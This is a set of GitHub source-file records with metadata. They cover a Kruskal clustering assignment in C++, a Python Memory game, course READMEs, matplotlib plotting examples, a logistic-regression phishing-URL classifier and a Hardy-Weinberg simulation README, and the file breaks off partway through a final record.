"content_id": "555fb8f5bbad78dedc2ceaa1bc1c1ae7825b958d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 8372,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 269,
"path": "/Algorithms on Graphs/Assignment5/clustering.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: clustering.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-24\r\n// description: Problem 2 of the fifth assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was: Given n points on a plane and an integer k, compute the largest possible value \r\n//\t\t\t\tof d such that the given points can be partitioned into k non - empty subsets in such a way \r\n//\t\t\t\tthat the distance between any two points from different subsets is at least d\r\n//\r\n//\t\t\t\tInput Format. The first line contains the number n of points. Each of the following n lines \r\n//\t\t\t\tdefines a point (xi, yi). The last line contains the number k of clusters\r\n//\r\n//\t\t\t\tOutput: Output the largest value of d. The absolute value of the difference\r\n//\t\t\t\tbetween the answer of this program and the optimal value is at most 10e−6\r\n//\r\n// \r\n//\t\t\t\tStarter file with main function was already provided\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.02/2.00 sec, max memory used: 8.6/512 MB. \r\n\r\n#include <algorithm>\r\n#include <iostream>\r\n#include <iomanip>\r\n#include <cassert>\r\n#include <vector>\r\n#include <cmath>\r\n#include <numeric> \r\n\r\n#define edge pair<int,int>\r\n\r\nusing std::vector;\r\nusing std::pair;\r\n\r\n// sort pairs of edge and their weight based on the the weights\r\nstruct sort_pairs {\r\n\tbool operator()(const std::pair<edge, double> &left, const std::pair<edge, double> &right) {\r\n\t\treturn left.second < right.second;\r\n\t}\r\n};\r\n\r\n/*\r\n// The root, weighted_union, and find functions are for the disjoint data structure used in\r\n// kruskal's agorithm which is implemented to solve the clustering problem.\r\n// Source:https://www.hackerearth.com/notes/disjoint-set-union-union-find/\r\n*/\r\n\r\n// Return the root node of u\r\n// \r\n// PRE: nodes are not forming a cycle\r\n// POST: return the root node\r\n// PARAM: parent = vector with indexes as nodes and their values as the node's parents\r\n//\t\t u = a node for which are finding its root node\r\nint root(vector<int> &parents, int u)\r\n{\r\n\t//while parent of us is not u i.e u is not root\r\n\twhile (parents[u] != u)\r\n\t{\r\n\t\tparents[u] = parents[parents[u]]; // set parent of u as it grandparent (path compression)\r\n\t\tu = parents[u]; \r\n\t}\r\n\treturn u;\r\n}\r\n\r\n// Performs a union of two different sets based on their size\r\n// \r\n// PRE: root of u and root of v are not the same i.e u and v belong to different sets.\r\n//\t\tsize of all nodes are 1 since each node makes up a set with root node being itself\r\n// POST: updates the parent for the root node of the set with smaller size to\r\n//\t\t the root of the larger set. 
Updates the set sizes accordingly\r\n// PARAM: parents = vector with indexes as nodes and their values as the nodes' parents\r\n//\t\t size = vector with the size of each set.\r\n//\t\t u = a node in a set\r\n//\t\t v = a node in a different set\r\nvoid weighted_union(vector<int> &parents, vector<int> &size, int u, int v) {\r\n\r\n\tint rootOfu = root(parents,u);\r\n\tint rootOfv = root(parents,v);\r\n\r\n\t//if the set with node u is smaller than the set with node v\r\n\tif (size[rootOfu] < size[rootOfv]) {\r\n\t\t//update the parent of the root node of the set with u to the root node of the set with v\r\n\t\tparents[rootOfu] = parents[rootOfv];\r\n\t\t//update the size of the set with v\r\n\t\tsize[rootOfv] += size[rootOfu];\r\n\t}\r\n\t// do the opposite\r\n\telse {\r\n\t\tparents[rootOfv] = parents[rootOfu];\r\n\t\tsize[rootOfu] += size[rootOfv];\r\n\t}\r\n\r\n}\r\n\r\n// Finds whether two nodes belong to the same set by finding their root nodes\r\n// \r\n// PRE: \r\n// POST: returns true if the two nodes u and v belong to the same set, false otherwise\r\n// PARAM: parents = vector with indexes as nodes and their values as the nodes' parents\r\n//\t\t u = a node in a set\r\n//\t\t v = a node in a different set\r\nbool find(vector<int> &parents,int u, int v)\r\n{\r\n\tif (root(parents,u) == root(parents,v)) \r\n\t\treturn true;\r\n\telse\r\n\t\treturn false;\r\n}\r\n\r\n// Uses Kruskal's algorithm to find the largest possible value of d such that the given points\r\n// can be partitioned into k non - empty subsets in such a way that the distance between any two \r\n// points from different subsets is at least d\r\n// \r\n// PRE: 2 ≤ k ≤ n ≤ 200; 10e-3 ≤ xi,yi ≤ 10e3 are all integers; All points (xi, yi) are pairwise different, \r\n//\t\t(note xi and yi are the same as the values x[i] and y[i]; x.size() = y.size() = n = No. of points) \r\n// POST: returns the value d as described above\r\n// PARAM: x = vector with all the x coordinate values of the points\r\n//\t\t y = vector with all the y coordinate values of the points\r\n//\t\t k = number of partitions to be made to the cluster of points\r\n\r\ndouble clustering(vector<int> x, vector<int> y, int k) {\r\n\r\n\t//create a parent vector used for the disjoint-set data structure\r\n\tvector<int> parents(x.size()); \r\n\t//update the parent vector with consecutive values from 0 to size-1\r\n\t//since initially all nodes/points are parents of themselves\r\n\tstd::iota(parents.begin(), parents.end(), 0); \r\n\t//set the size of each set as 1\r\n\tvector<int> size(x.size(), 1);\r\n\t//initialize the vector of pairs of edges and their weights. Each edge connects\r\n\t//two points and the distance between them is its weight. Each point can be\r\n\t//connected to n-1 other points. 
Thus n points can form n*(n-1) directed edges,\r\n\t//which is the total number of possible edge combinations\r\n\tvector < pair<edge, double> > edgeWeight;\r\n\t//reserve (rather than pre-size) since edges are appended with push_back below;\r\n\t//pre-sizing would prepend n*(n-1) dummy zero-weight entries\r\n\tedgeWeight.reserve(x.size()*(x.size()-1));\r\n\tedge anEdge;\r\n\tdouble weight;\r\n\tint v1;\r\n\tint v2;\r\n\tint counter = 0;\r\n\r\n\t/*\r\n\t//the for loop code block updates the weight of every possible edge combination\r\n\t//between a pair of points, except for a point connecting to itself (no edge to itself)\r\n\t*/\r\n\tfor (int u = 0; u < x.size(); u++) {\r\n\r\n\t\tfor (int v = 0; v < y.size(); v++) {\r\n\t\t\tif (u != v) {\r\n\t\t\t\t//find the distance between the two points\r\n\t\t\t\tweight = sqrt(pow((x[u] - x[v]), 2) + pow((y[u] - y[v]), 2));\r\n\t\t\t\tanEdge.first = u;\r\n\t\t\t\tanEdge.second = v;\r\n\t\t\t\tedgeWeight.push_back(std::make_pair(anEdge,weight));\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t//sort edges based on their edge weight. Note that we will have duplicate\r\n\t//edge weights since an edge from u to v will have the same distance as an edge\r\n\t//from v to u\r\n\tstd::sort(edgeWeight.begin(), edgeWeight.end(), sort_pairs());\r\n\r\n\t//for all possible edges\r\n\tfor (int i = 0; i < edgeWeight.size(); i++) {\r\n\t\t//get the points forming an edge with the next smallest weight\r\n\t\tv1 = edgeWeight[i].first.first;\r\n\t\tv2 = edgeWeight[i].first.second;\r\n\t\t//if these points/nodes do not belong to the same set i.e. they have different parents\r\n\t\tif (find(parents, v1, v2) == false) {\r\n\r\n\t\t\t//merge the two sets containing v1 and v2 respectively\r\n\t\t\tweighted_union(parents, size, v1, v2);\r\n\t\t\t//update the number of edges selected for Kruskal's algorithm\r\n\t\t\t++counter;\r\n\t\t}\r\n\t\t//the (n-(k-1))th edge will have the weight equal to d since this is the smallest distance\r\n\t\t//that connects two points in different partitions/clusters\r\n\t\tif (counter == (x.size() - k + 1))\r\n\t\t\treturn edgeWeight[i].second;\r\n\t}\r\n\r\n\t//should not be reached for valid input (2 <= k <= n)\r\n\treturn 0.0;\r\n}\r\n\r\nint main() {\r\n\t\r\n\tsize_t n;\r\n\tint k;\r\n\tstd::cin >> n;\r\n\tvector<int> x(n), y(n);\r\n\tfor (size_t i = 0; i < n; i++) {\r\n\t\tstd::cin >> x[i] >> y[i];\r\n\t}\r\n\tstd::cin >> k;\r\n\tstd::cout << std::setprecision(10) << clustering(x, y, k) << std::endl;\r\n\r\n\t// Test cases to check if the clustering function works. They are commented out since the \r\n\t// assignment requires the clustering.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/************************************************************************************************************\r\n\t\r\n\t/*\r\n\tvector<int> x1(12), y1(12);\r\n\tx1[0] = 7;\r\n\ty1[0] = 6;\r\n\r\n\tx1[1] = 4;\r\n\ty1[1] = 3;\r\n\r\n\tx1[2] = 5;\r\n\ty1[2] = 1;\r\n\r\n\tx1[3] = 1;\r\n\ty1[3] = 7;\r\n\r\n\tx1[4] = 2;\r\n\ty1[4] = 7;\r\n\r\n\tx1[5] = 5;\r\n\ty1[5] = 7;\r\n\r\n\tx1[6] = 3;\r\n\ty1[6] = 3;\r\n\r\n\tx1[7] = 7;\r\n\ty1[7] = 8;\r\n\r\n\tx1[8] = 2;\r\n\ty1[8] = 8;\r\n\r\n\tx1[9] = 4;\r\n\ty1[9] = 4;\r\n\r\n\tx1[10] = 6;\r\n\ty1[10] = 7;\r\n\r\n\tx1[11] = 2;\r\n\ty1[11] = 6;\r\n\r\n\tstd::cout << std::setprecision(10) << clustering(x1, y1, 3) << std::endl;\r\n\r\n\tvector<int> x2(8), y2(8);\r\n\tx2[0] = 3;\r\n\ty2[0] = 1;\r\n\r\n\tx2[1] = 1;\r\n\ty2[1] = 2;\r\n\r\n\tx2[2] = 4;\r\n\ty2[2] = 6;\r\n\r\n\tx2[3] = 9;\r\n\ty2[3] = 8;\r\n\r\n\tx2[4] = 9;\r\n\ty2[4] = 9;\r\n\r\n\tx2[5] = 8;\r\n\ty2[5] = 9;\r\n\r\n\tx2[6] = 3;\r\n\ty2[6] = 11;\r\n\r\n\tx2[7] = 4;\r\n\ty2[7] = 12;\r\n\r\n\tstd::cout << std::setprecision(10) << clustering(x2, y2, 4) << std::endl;\r\n\r\n\t*/\r\n}\r\n"
},
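The max-spacing k-clustering idea in clustering.cpp reads more directly in a few lines of Python: run Kruskal's algorithm with union-find and return the weight of the edge that performs the (n-k+1)th merge, which is the smallest distance connecting two of the k clusters, just as the C++ comments note. A compact sketch under those assumptions (the function name is illustrative):

```python
def max_spacing(points, k):
    """points: list of (x, y) tuples; returns the largest spacing d for k clusters."""
    parent = list(range(len(points)))

    def root(u):
        while parent[u] != u:
            parent[u] = parent[parent[u]]  # path compression
            u = parent[u]
        return u

    # all pairwise distances, smallest first (each undirected edge once)
    edges = sorted((((ax - bx) ** 2 + (ay - by) ** 2) ** 0.5, i, j)
                   for i, (ax, ay) in enumerate(points)
                   for j, (bx, by) in enumerate(points) if i < j)
    merges = 0
    for dist, u, v in edges:
        ru, rv = root(u), root(v)
        if ru != rv:
            parent[ru] = rv
            merges += 1
            if merges == len(points) - k + 1:
                # the edge that would reduce the k clusters to k-1
                return dist
```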
{
"alpha_fraction": 0.5305091142654419,
"alphanum_fraction": 0.5507190227508545,
"avg_line_length": 28.918603897094727,
"blob_id": "ab9cfe59bde4ea1d6f426052f1e37749e6309ebc",
"content_id": "d10137aefc261289ebd2b8602de1d28de3cb9aff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2573,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 86,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 2)/Mini-Project5 Memory/memory.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# implementation of card game - Memory\n\nimport simplegui\nimport random\n\ndeck_of_cards = []\nexposed_cards = []\nSIZE_OF_DECK = 16\nCARD_WIDTH = 50\nCARD_HEIGHT = 100\nTXT_SIZE = 50\nidx_card1 = 0\nidx_card2 = 0\nstate = 0\ntot_turns = 0\n\n# helper function to initialize globals\ndef new_game():\n global deck_of_cards, exposed_cards, state, tot_turns\n state = 0\n tot_turns = 0\n deck_of_cards = range(SIZE_OF_DECK/2)+ range(SIZE_OF_DECK/2)\n random.shuffle(deck_of_cards)\n exposed_cards = [False]*SIZE_OF_DECK\n label.set_text(\"Turns = \" + str(tot_turns))\n \n \n# define event handlers\ndef mouseclick(pos):\n global exposed_cards, state, idx_card1, idx_card2, tot_turns\n \n curr_exposed_idx = pos[0] // CARD_WIDTH\n \n if not exposed_cards[curr_exposed_idx]:\n if state == 0:\n state = 1\n exposed_cards[curr_exposed_idx] = True\n idx_card1 = curr_exposed_idx\n elif state == 1:\n state = 2\n exposed_cards[curr_exposed_idx] = True\n idx_card2 = curr_exposed_idx\n tot_turns += 1\n elif state == 2:\n if (deck_of_cards[idx_card1] != deck_of_cards[idx_card2]):\n exposed_cards[idx_card1] = False\n exposed_cards[idx_card2] = False\n\n exposed_cards[curr_exposed_idx] = True\n idx_card1 = curr_exposed_idx\n state = 1\n \n label.set_text(\"Turns = \" + str(tot_turns))\n \n# cards are logically 50x100 pixels in size \ndef draw(canvas):\n i = 0\n for num, is_exposed in zip(deck_of_cards, exposed_cards):\n txt_size = frame.get_canvas_textwidth(str(num), TXT_SIZE)\n if (is_exposed):\n canvas.draw_text(str(num), (txt_size/2 +CARD_WIDTH*i, \n CARD_HEIGHT/2 + TXT_SIZE/2),\n TXT_SIZE, 'white')\n else:\n canvas.draw_polygon([(CARD_WIDTH * i, 0), \n (CARD_WIDTH * i, CARD_HEIGHT), \n (CARD_WIDTH * (i+1), CARD_HEIGHT),\n (CARD_WIDTH * (i+1) , 0)], 1,\n 'gold', 'green')\n i+=1\n \n\n\n# create frame and add a button and labels\nframe = simplegui.create_frame(\"Memory\", CARD_WIDTH * SIZE_OF_DECK, CARD_HEIGHT)\nframe.add_button(\"Reset\", new_game)\nlabel = frame.add_label(\"Turns = 0\")\n\n\n# register event handlers\nframe.set_mouseclick_handler(mouseclick)\nframe.set_draw_handler(draw)\n\n# get things rolling\nnew_game()\nframe.start()\n"
},
{
"alpha_fraction": 0.7981157302856445,
"alphanum_fraction": 0.8061911463737488,
"avg_line_length": 122.88888549804688,
"blob_id": "76b9f891deeb6144f64d53be164da5af124850cb",
"content_id": "2f64056397b4b3c81ae9efe89b517bafb7aafe0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2229,
"license_type": "no_license",
"max_line_length": 566,
"num_lines": 18,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 1/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Project and Application Overviews\n## Project #1: Degree Distribution for Graphs\n\n* For your first project, you will write Python code that creates dictionaries corresponding to some simple examples of graphs. You will also implement two short functions that compute information about the distribution of the in-degrees for nodes in these graphs. You will then use these functions in the Application component of Module 1 where you will analyze the degree distribution of a citation graph for a collection of physics papers. This final portion of module will be peer assessed.\n\n* We will use Python 2 in this class since OwlTest (the machine grader) supports Python 2. For more information on recommended Python IDEs, please consult this class page. Note that this portion of the module should be simple for experienced Python programmers. If you find it challenging, your Python skills may not be sufficient to be successful in this class.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/algorithmic-thinking-1/supplement/hw1o3/project-1-description>\n\n## Application #1: Analysis of Citation Graphs\n\n* In the Module 1 Application, we will combine the mathematical analysis that we began in the Homework with the code that you have written in the Project to analyze a real-world problem: How do scientific papers get cited? This part of the module will probably be much more unstructured than you are accustomed to in an on-line class. Our goal is to provide a more realistic simulation of how the concepts that you are learning are actually used in practice. Your key task in this part of the module is to think about the problem at hand as you answer each question.\n\n* As part of this portion of the module, you'll need to write code that processes medium-sized datasets. You are welcome to use either desktop Python or CodeSkulptor when writing this code. To process the data in CodeSkulptor, you will need to be careful in how you implement your code and will probably need to increase the default timeout from 5 secs to around 20-30 secs.\n\nComplete application description can be found at : \n<https://www.coursera.org/learn/algorithmic-thinking-1/supplement/i4zaL/application-1-description>"
}
] | 62 |
MarcGershow/python-plotting-examples-lecture-4 | https://github.com/MarcGershow/python-plotting-examples-lecture-4 | 4adf0a9ede90314d9cbcdfb914e961b4347c2760 | c60cbe39a37921a3d766f89394b86eb10858c85e | 029a44485e7c252f4d82c924d2d898d7f0d1c54c | refs/heads/master | 2020-03-31T15:45:32.058418 | 2018-10-10T02:45:58 | 2018-10-10T02:45:58 | 152,350,250 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6735848784446716,
"alphanum_fraction": 0.7004716992378235,
"avg_line_length": 23.34482765197754,
"blob_id": "6702cfb936620ff3b39631162095eaff0058721a",
"content_id": "d44b546646c06ec300d4347d27b9a796c31823cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2120,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 87,
"path": "/plotting examples.py",
"repo_name": "MarcGershow/python-plotting-examples-lecture-4",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 8 16:01:27 2018\n\n@author: gershow\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"\nplot sin and cosine over a 2 pi period\nadd a title and legend\n\"\"\"\nplt.figure(1)\nplt.clf()\nt = np.linspace(0,2*np.pi,100)\nx = np.sin(t)\nl1 = plt.plot(t,x, 'b-', label = 'sin')\n\ny = np.cos(t)\nl2 = plt.plot(t,y, 'g*-', label = 'cosine')\n\nplt.legend()\nplt.title(\"Sines and Cosines\")\nplt.xlabel(\"t\")\n\n\"\"\"\nplot a red circle of radius 1\n\"\"\"\n\nplt.figure(2)\nplt.plot(x,y,'r-')\nplt.title (\"my circle looks like an ellipse because the axes aren't scaled equally\")\nplt.show();\n\n\n\"\"\"\nplot a red circle of radius 1\nthat doesn't look like an ellipse\n\"\"\"\n\nplt.figure(3)\nplt.plot(x,y,'r-')\nplt.title ('axes equally scaled')\nax = plt.gca() #gca = \"get current axes\"\nax.axis('equal') #set x-axis and y-axis to be equally scaled\nplt.show();\n\n\"\"\"\nplots adjusted approval polls for donald trump\nas collected and adjusted by fivethirtyeight\n\"\"\"\nmydata = np.loadtxt('polls.txt');\nday = mydata[:,0]\napprove = mydata[:,1]\ndisapprove = mydata[:,2]\nelectionday = 43410 #nov 6 2018 in microsoft date code\n\nplt.figure(4)\nplt.clf()\nplt.plot(electionday-day, approve, 'ro', markersize = 1, label = 'approve')\nplt.plot(electionday-day, disapprove, 'bo', markersize = 1, label = 'disapprove')\nax = plt.gca()\nax.invert_xaxis()\nplt.xlabel('days until midterm election')\nplt.ylabel('approval')\nplt.title('fivethirtyeight collected and adjusted approval polls')\nplt.legend()\n\n\"\"\"\nmakes a histogram of approval and disapproval polls from above\ndivides by total number of samples to get a normalized distribution\n\"\"\"\nplt.figure(5)\nplt.clf()\nbinedges = np.arange(25,76)\nhapp,_binedges = np.histogram(approve,binedges) #_binedges means ignore this output\nhdis,_binedges = np.histogram(disapprove,binedges)\nbins = np.arange(25,75)\nplt.bar(bins, happ/np.sum(happ), width=1, color='r', label='approve')\nplt.bar(bins, hdis/np.sum(hdis), width=1, color='b', label='disapprove')\nplt.xlabel('adjusted poll value')\nplt.ylabel('fraction of polls')\nplt.title('all polls since january 2017')\nplt.legend()\n\n\n"
},
{
"alpha_fraction": 0.7916666865348816,
"alphanum_fraction": 0.8194444179534912,
"avg_line_length": 35,
"blob_id": "cc701309ad4a53baf68102462721b50b842560ee",
"content_id": "6715ab002cad6474140e28b036c84c09ee431719",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 144,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 4,
"path": "/README.md",
"repo_name": "MarcGershow/python-plotting-examples-lecture-4",
"src_encoding": "UTF-8",
"text": "# python-plotting-examples-lecture-4\n\npolls are from the 538 dataset\nhttps://github.com/fivethirtyeight/data/tree/master/trump-approval-ratings\n"
}
] | 2 |
srikanthiremath/Phishing-Detector-using-LR | https://github.com/srikanthiremath/Phishing-Detector-using-LR | c975735567bf091bd7c1d5d645c3f4b0196ea50c | 3edad78aa3e656ae10f80098a11fa0d9c573c5a6 | c9d90075404dd97c83d1245380e257578a7c8b68 | refs/heads/master | 2020-05-15T13:15:43.772609 | 2019-04-19T16:21:37 | 2019-04-19T16:21:37 | 182,292,917 | 4 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6594439744949341,
"alphanum_fraction": 0.6927636861801147,
"avg_line_length": 29.172840118408203,
"blob_id": "aec33441dace3ede27955c4cdf03fe57b285b696",
"content_id": "8c0cba91c533f92c5285a9026cc409f4fa22ffcb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4892,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 162,
"path": "/lrphishing.py",
"repo_name": "srikanthiremath/Phishing-Detector-using-LR",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 25 18:18:55 2018\n\n@author: SRIKANT\n\"\"\"\n#import packages\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n#load Dataset and classify as features and label\nphishingData = pd.read_csv('phishing.txt')\nX = phishingData.iloc[:,:-1].values\ny = phishingData.iloc[:,30].values\n\n#split features and label into training ang testing data\nfrom sklearn.cross_validation import train_test_split\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.3,random_state=4)\n\n#perform feature scaling\nfrom sklearn.preprocessing import StandardScaler\nscalar = StandardScaler()\nX_train = scalar.fit_transform (X_train)\nX_test = scalar.fit_transform (X_test) \n\n#Logistic Regression Classifier \nfrom sklearn.linear_model import LogisticRegression\nLRclassifier = LogisticRegression(C=100,random_state=0)\nLRclassifier.fit(X_train,y_train)\n\nLRpredict = LRclassifier.predict(X_test)\n\n#LRC training score\nLRclassifier.score(X_train,y_train)\n\n#LRC test score\nLRclassifier.score(X_test,y_test)\n\n#confusion matrix for printing count of misclassified samples in the test data prediction\nfrom sklearn.metrics import confusion_matrix\nconfusionMatrix = confusion_matrix(y_test,LRpredict)\n\n\n\n#=================================================================================================\n\n\n# classify as features(Prefix_Suffix and URL_of_Anchor) and label with index 5\nX = phishingData.iloc[0:5,[6,14]].values\ny = phishingData.iloc[0:5,30].values\n\n#split features and label into training ang testing data\nfrom sklearn.cross_validation import train_test_split\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.3,random_state=4)\n\n#perform feature scaling\nfrom sklearn.preprocessing import StandardScaler\nscalar = StandardScaler()\nX_train = scalar.fit_transform (X_train)\nX_test = scalar.fit_transform (X_test) \n\n#Logistic Regression Classifier \nfrom sklearn.linear_model import LogisticRegression\nLRclassifier1 = LogisticRegression(C=100,random_state=0)\nLRclassifier1.fit(X_train,y_train)\n\n\nLRpredict1 = LRclassifier1.predict(X_test)\n\n#LRC training score\nLRclassifier1.score(X_train,y_train)\n\n#LRC test score\nLRclassifier1.score(X_test,y_test)\n\n#confusion matrix for printing count of misclassified samples in the test data prediction\nfrom sklearn.metrics import confusion_matrix\nLRconfusionMatrix1 = confusion_matrix(y_test,LRpredict1)\n\n#visualize the Test set\nxx, yy = np.mgrid[-5:5:.01, -5:5:.01]\ngrid = np.c_[xx.ravel(), yy.ravel()]\nprobs = LRclassifier1.predict_proba(grid)[:, 1].reshape(xx.shape)\n\nprint(probs)\n\nf, ax = plt.subplots(figsize=(8, 6))\ncontour = ax.contourf(xx, yy, probs, 25, cmap=\"RdBu\",\n vmin=0, vmax=1)\nax_c = f.colorbar(contour)\nax_c.set_label(\"$P(y = 1)$\")\nax_c.set_ticks([0, .25, .5, .75, 1])\n\nax.scatter(X_test[:, 0], X_test[:, 1],c = (y_test == 1 ), s=50,\n cmap=\"RdBu\", vmin=-.2, vmax=1.2,\n edgecolor=\"white\", linewidth=1)\n\nax.set(aspect=\"equal\",\n xlim=(-5, 5), ylim=(-5, 5),\n xlabel=\"$X_1$\", ylabel=\"$X_2$\")\n\nplt.show()\n\n#===========================================================================================\n\n\n# classify as features(Prefix_Suffix and URL_of_Anchor) and label with index 13\nX = phishingData.iloc[0:13,[6,14]].values\ny = phishingData.iloc[0:13,30].values\n\n#split features and label into training ang testing data\nfrom sklearn.cross_validation import train_test_split\nX_train,X_test,y_train,y_test = 
train_test_split(X,y,test_size=0.3,random_state=4)\n\n#perform feature scaling\nfrom sklearn.preprocessing import StandardScaler\nscalar = StandardScaler()\nX_train = scalar.fit_transform (X_train)\nX_test = scalar.transform (X_test)\n\n#Logistic Regression Classifier \nfrom sklearn.linear_model import LogisticRegression\nLRclassifier11 = LogisticRegression(C=100,random_state=0)\nLRclassifier11.fit(X_train,y_train)\n\n\nLRpredict11 = LRclassifier11.predict(X_test)\n\n#LRC training score\nLRclassifier11.score(X_train,y_train)\n\n#LRC test score\nLRclassifier11.score(X_test,y_test)\n\n#confusion matrix for printing count of misclassified samples in the test data prediction\nfrom sklearn.metrics import confusion_matrix\nLRconfusionMatrix11 = confusion_matrix(y_test,LRpredict11)\n\n#visualize the Test set \nxx, yy = np.mgrid[-5:5:.01, -5:5:.01]\ngrid = np.c_[xx.ravel(), yy.ravel()]\nprobs = LRclassifier11.predict_proba(grid)[:, 1].reshape(xx.shape)\n\nprint(probs)\n\nf, ax = plt.subplots(figsize=(8, 6))\ncontour = ax.contourf(xx, yy, probs, 25, cmap=\"RdBu\",\n vmin=0, vmax=1)\nax_c = f.colorbar(contour)\nax_c.set_label(\"$P(y = 1)$\")\nax_c.set_ticks([0, .25, .5, .75, 1])\n\nax.scatter(X_test[:, 0], X_test[:, 1],c = (y_test == 1 ), s=50,\n cmap=\"RdBu\", vmin=-.2, vmax=1.2,\n edgecolor=\"white\", linewidth=1)\n\nax.set(aspect=\"equal\",\n xlim=(-5, 5), ylim=(-5, 5),\n xlabel=\"$X_1$\", ylabel=\"$X_2$\")\n\nplt.show()\n\n\n\n\n"
}
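One detail worth noting in the scaling steps above: the scaler's statistics (mean and standard deviation) should be learned from the training split only and then applied unchanged to the test split, otherwise information leaks from the test set into preprocessing. A minimal self-contained sketch of that pattern, using the modern `sklearn.model_selection` import (the file above uses the older `sklearn.cross_validation` module, which has since been removed) and stand-in random data in place of the phishing dataset:

```python
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler

X = np.random.rand(100, 2)        # stand-in features
y = np.random.randint(0, 2, 100)  # stand-in labels

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=4)

scaler = StandardScaler()
X_train = scaler.fit_transform(X_train)  # learn mean/std from the training split only
X_test = scaler.transform(X_test)        # apply the same statistics to the test split
```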
] | 1 |
williamwisdom/biology | https://github.com/williamwisdom/biology | c57b131d5d27ff9d4b69bf19773a6759ccb0c7cb | 6db22dd6eb181a06f435e11f3b2466ca9efe9a43 | 53ece4a42d4dea04ac1fe06dc640b8e8f77560ed | refs/heads/master | 2018-10-27T04:20:22.320252 | 2018-09-25T03:54:08 | 2018-09-25T03:54:08 | 125,884,564 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7683880925178528,
"alphanum_fraction": 0.8059467673301697,
"avg_line_length": 238.625,
"blob_id": "373ee50c1d833e5464b9e94744735a8c6c98bb9f",
"content_id": "7fe7d4a119f0a1ca525ec0e38902131014b997f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1919,
"license_type": "no_license",
"max_line_length": 685,
"num_lines": 8,
"path": "/README.md",
"repo_name": "williamwisdom/biology",
"src_encoding": "UTF-8",
"text": "# Fast Hardy-Weinberg equilibrium simulation\n\nThis project contains three versions of hardy-weinstein equilibrium simulation:\n 1. Relatively slow and easy to make python implementation, located in generations.py. Benchmarks are listed at the top of generations.py. The average is something like 150k 'matings' per second. The advantage to using this is that it is very flexible.\n 2. Relatively fast and much more difficult to make C implementation, located in generations.c. Current benchmark is 172m 'matings' per second. However, it is less flexible due to being written in C. There is a wrapper located in generations_controller.py that currently doesn't work but in theory pipes output to the C output and graphs it live in matplotlib.\n 3. Much faster GPU version currently without a pipeline for graphing, located in biology.cu. Current benchmark with 64 blocks and 128 threads per block with 16m organisms and 1 million generations is 24500m matings per second. With less organisms and generations, the benchmark reduces to e.g. 2200m matings per second with 131k organisms and 50k generations. These were all tested on a Tesla P100 GPU. CPU speed shouldn't matter. Requires less than 1GB of memory. Compile using nvcc. \n\ngenerations.c can be built by `make standard`. If you are starting this up for the first time, you should probably change the compiler it uses. Currently it links to the gcc location on my computer. I would highly recommend GCC as opposed to clang, because at least on my computer the benchmark provided by `make speedtest` (microseconds per generation of 65536) was 850µs with clang and 600µs with gcc. This was before the decisions on whether to take both bits from one parent or take one bit from each parent was moved up to the front, [this commit](https://github.com/williamwisdom/biology/commit/243696f6f1fc2dc9c289ec91199cf5e3a5890d89) so the difference is likely different now.\n"
},
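For readers unfamiliar with the simulation itself, the core "mating" step that all three implementations benchmark is simple: each offspring draws one allele from each of two randomly chosen parents, and the genotype counts (AA/AB/BB) of one generation become the sampling weights for the next. A rough Python sketch of one generation follows; it mirrors the threshold-based sampling idea used in generations.c, not any one implementation's exact code.

```python
import random

def next_generation(num_aa, num_ab, num_bb):
    """Return (aa, ab, bb) counts after one generation of random mating."""
    population = num_aa + num_ab + num_bb
    counts = [0, 0, 0]  # index = number of 'b' alleles in the offspring
    for _ in range(population):
        offspring = 0
        for _parent in range(2):
            draw = random.randrange(population)
            if draw < num_aa:
                allele = 0                      # parent is AA: contributes 'a'
            elif draw < num_aa + num_ab:
                allele = random.getrandbits(1)  # parent is AB: coin flip
            else:
                allele = 1                      # parent is BB: contributes 'b'
            offspring += allele
        counts[offspring] += 1
    return tuple(counts)
```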
{
"alpha_fraction": 0.643750011920929,
"alphanum_fraction": 0.6656249761581421,
"avg_line_length": 34.55555725097656,
"blob_id": "2c767ccbca19f3057e69ca15858bfdfb8cd42898",
"content_id": "781a0428e248049b7fe152feb928ed0976bb7ba2",
"detected_licenses": [],
"is_generated": false,
